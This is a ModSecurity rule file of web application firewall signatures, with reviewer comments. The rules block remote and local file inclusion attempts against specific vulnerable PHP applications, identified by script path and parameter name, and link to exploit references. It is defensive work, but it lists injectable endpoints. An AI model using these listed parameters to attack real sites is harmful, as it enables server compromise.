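SecRule REQUEST_LINE "@contains /e-pay/src/a_affil.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010661,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS epay a_affil.php _REQUEST Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10697'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:_REQUEST\[read\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS epay a_affil.php _REQUEST Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009188)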
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gapicms toolbar.php dirDepth Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /toolbar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009188,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS gapicms toolbar.php dirDepth Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:dirDepth/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gapicms toolbar.php dirDepth Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the gnuedu rules below are two-link chains: a substring match
# of the script path in the request line, then a count of TX variables whose
# name matches /RFI.*ARGS:ETCDIR/. They carry no "GET " link, so they apply to
# any request method. The rule that sets the counted TX variable is not in this
# excerpt - confirm it runs before these rules.

# (2003718) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR
SecRule REQUEST_LINE "@contains /libs/lom.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003718,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom_update.php ETCDIR
SecRule REQUEST_LINE "@contains /lom_update.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003719,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom_update.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule
&TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom_update.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003720) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- check-lom.php ETCDIR
# Two-link chain: path substring in the request line, then at least one TX
# variable whose name matches /RFI.*ARGS:ETCDIR/.
SecRule REQUEST_LINE "@contains /scripts/check-lom.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003720,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- check-lom.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- check-lom.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003721) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- weigh_keywords.php ETCDIR
SecRule REQUEST_LINE "@contains /scripts/weigh_keywords.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003721,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- weigh_keywords.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- weigh_keywords.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- logout.php ETCDIR
# NOTE(review): "/logout.php" is a substring test on a script name shared by
# many applications, so the product-specific label in msg rests on the ETCDIR
# condition alone; expect this id on any site where that TX variable is set.
SecRule REQUEST_LINE "@contains /logout.php"
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003722,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- logout.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- logout.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the two rules below match "/help.php" and "/index.php" as
# substrings of the request line. Those names are not specific to one product,
# so the only discriminating condition is the count of TX variables whose name
# matches /RFI.*ARGS:ETCDIR/. When that condition holds, each rule adds
# tx.critical_anomaly_score to tx.anomaly_score.

# (2003723) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- help.php ETCDIR
SecRule REQUEST_LINE "@contains /help.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003723,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- help.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- help.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- index.php ETCDIR
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003724,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- index.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- index.php 
ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003725) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- login.php ETCDIR
# NOTE(review): "/login.php" is a substring test on a very common script name;
# the ETCDIR TX condition is what ties this rule to the named application.
SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003725,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- login.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- login.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR
# Same msg text as the other "lom.php ETCDIR" rule, but this id matches the
# path "/web/lom.php"; use the rule id, not msg, to tell the two apart in logs.
SecRule REQUEST_LINE "@contains /web/lom.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003747,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3876'"
SecRule &TX:'/RFI.*ARGS:ETCDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gnuedu Remote Inclusion Attempt -- lom.php ETCDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010979) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ispCP Omega admin1.template.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /tools/filemanager/skins/mobile/admin1.template.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010979,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 
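ispCP Omega admin1.template.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,38644'"
SecRule REQUEST_LINE "@contains GET " "chain"
# The TX selector between the slashes is a regular expression. The brackets of
# the parameter name are escaped so the literal name
# net2ftp_globals[application_skinsdir] is matched; unescaped, the bracketed
# part is a character class and the real name would not satisfy the pattern.
SecRule &TX:'/RFI.*ARGS:net2ftp_globals\[application_skinsdir\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ispCP Omega admin1.template.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS justVisual contact.php fs_jVroot Parameter Remote File Inclusion
# Chain: script path in the request line, "GET " in the request line, and at
# least one TX variable whose name matches /RFI.*ARGS:fs_jVroot/.
SecRule REQUEST_LINE "@contains /test/pages/contact.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010191,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS justVisual contact.php fs_jVroot Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:fs_jVroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS justVisual contact.php fs_jVroot Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010192) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS justVisual pageTemplate.php fs_jVroot Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /system/pageTemplate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010192,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS justVisual pageTemplate.php fs_jVroot Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:fs_jVroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS justVisual pageTemplate.php fs_jVroot Parameter Remote File 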
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS justVisual utilities.php fs_jVroot Parameter Remote File Inclusion
# Chain: script path in the request line, "GET " in the request line, and at
# least one TX variable whose name matches /RFI.*ARGS:fs_jVroot/.
SecRule REQUEST_LINE "@contains /system/utilities.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010193,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS justVisual utilities.php fs_jVroot Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:fs_jVroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS justVisual utilities.php fs_jVroot Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009053) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS Thumbnail.php base_path Remote File Inclusion
# NOTE(review): @contains is a plain substring test, so "/Thumbnail.php" is
# matched with this exact letter case; no lowercase transformation is listed
# on this rule. Confirm that is intended for hosts with case-insensitive paths.
SecRule REQUEST_LINE "@contains /Thumbnail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009053,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS Thumbnail.php base_path Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:base_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS Thumbnail.php base_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003684) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MXBB Remote Inclusion Attempt -- faq.php module_root_path
SecRule REQUEST_LINE "@contains /faq.php"
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003684,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MXBB Remote Inclusion Attempt -- faq.php module_root_path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3833'"
# NOTE(review): msg names the parameter module_root_path, but this link counts
# TX variables recorded for ARGS:cmd. If module_root_path is the parameter of
# interest, a request carrying only that parameter is not scored by id 2003684.
# Confirm the intended parameter against the referenced advisory.
SecRule &TX:'/RFI.*ARGS:cmd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MXBB Remote Inclusion Attempt -- faq.php module_root_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the two pHNews rules below test the argument value itself for
# the substring "../" instead of counting a TX variable. The final link names
# no t: transformations of its own, so what it inherits depends on
# configuration outside this excerpt - confirm that backslash-separated or
# still-encoded forms are normalised before this test. The TX key these rules
# write is labelled WEB_ATTACK/RFI although msg describes a local file
# inclusion; keep that in mind when filtering logs by key name.

# (2009719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion
SecRule REQUEST_LINE "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009719,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:templates_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php templates_dir Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009720) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion
SecRule REQUEST_LINE "@contains /modules/comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009720,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS pHNews comments.php template Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,19838'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pHNews comments.php template Local File 
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the pfa CMS rules below are two-link chains with no "GET "
# link: a path substring in the request line, then a count of TX variables
# whose name matches /RFI.*ARGS:abs_path/. "/index.php" and "/checkout.php" are
# common script names, so the TX condition carries the specificity.

# (2003698) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php abs_path
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003698,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded'"
SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003699) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion checkout.php abs_path
SecRule REQUEST_LINE "@contains /checkout.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003699,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion checkout.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded'"
SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion checkout.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003700) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion libsecure.php abs_path
SecRule REQUEST_LINE "@contains /libsecure.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003700,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS 
Remote Inclusion libsecure.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded'"
SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion libsecure.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003701) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php repinc
# Two-link chain, any method: "/index.php" substring in the request line, then
# at least one TX variable whose name matches /RFI.*ARGS:repinc/.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003701,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php repinc',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467827/100/0/threaded'"
SecRule &TX:'/RFI.*ARGS:repinc/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pfa CMS Remote Inclusion index.php repinc',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009325) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion
# Three-link chain: path substring, "GET " in the request line, then the TX
# count for the icerikyolu parameter. Requests using another method are not
# scored by this rule.
SecRule REQUEST_LINE "@contains /gunaysoft.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009325,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3022'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:icerikyolu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009326)
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /gunaysoft.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009326,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3022'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:sayfaid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009327) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php uzanti Parameter Remote File Inclusion
# Same script path and CVE tag as the sayfaid rule above; only the parameter
# named in the TX key pattern differs, so one request can raise several ids.
SecRule REQUEST_LINE "@contains /gunaysoft.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009327,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phPortal gunaysoft.php uzanti Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3022'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:uzanti/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phPortal gunaysoft.php uzanti Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2002879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP phpMyAgenda rootagenda Remote File Include Attempt
# NOTE(review): unlike the rules above, this chain starter has no REQUEST_LINE
# path condition: it tests the count of TX variables matching
# /RFI.*ARGS:rootagenda/ directly, so it applies to every URL. The t: actions
# listed on it operate on that count, and logdata '%{TX.0}' depends on a
# capture that a numeric @gt comparison may not provide - verify what is logged.
SecRule &TX:'/RFI.*ARGS:rootagenda/' "@gt 0" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002879,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP phpMyAgenda rootagenda Remote File Include 
Attempt',tag:'web-application-attack',tag:'bugtraq,17670'"
# NOTE(review): this link repeats the condition of the rule it is chained to
# (same &TX selector, same "@gt 0"), so it adds no further constraint; it only
# carries the scoring actions for id 2002879.
SecRule &TX:'/RFI.*ARGS:rootagenda/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP phpMyAgenda rootagenda Remote File Include Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009397) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpProfiles body_comm.inc.php content parameter remote file inclusion
# NOTE(review): the TX key pattern /RFI.*ARGS:content/ is unanchored, so a TX
# entry recorded for a longer parameter name beginning with "content" also
# satisfies it; the path link limits this to body_comm.inc.php requests.
SecRule REQUEST_LINE "@contains /body_comm.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009397,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpProfiles body_comm.inc.php content parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,27952'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:content/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpProfiles body_comm.inc.php content parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion
# NOTE(review): msg describes a local file inclusion, yet the final link
# counts a TX variable under an RFI key rather than testing the editform value
# for traversal. Whether the rule that sets that key covers local paths is not
# visible here - confirm.
SecRule REQUEST_LINE "@contains /addedit-render.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008992,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32774'"
SecRule REQUEST_LINE "@contains GET " "chain"
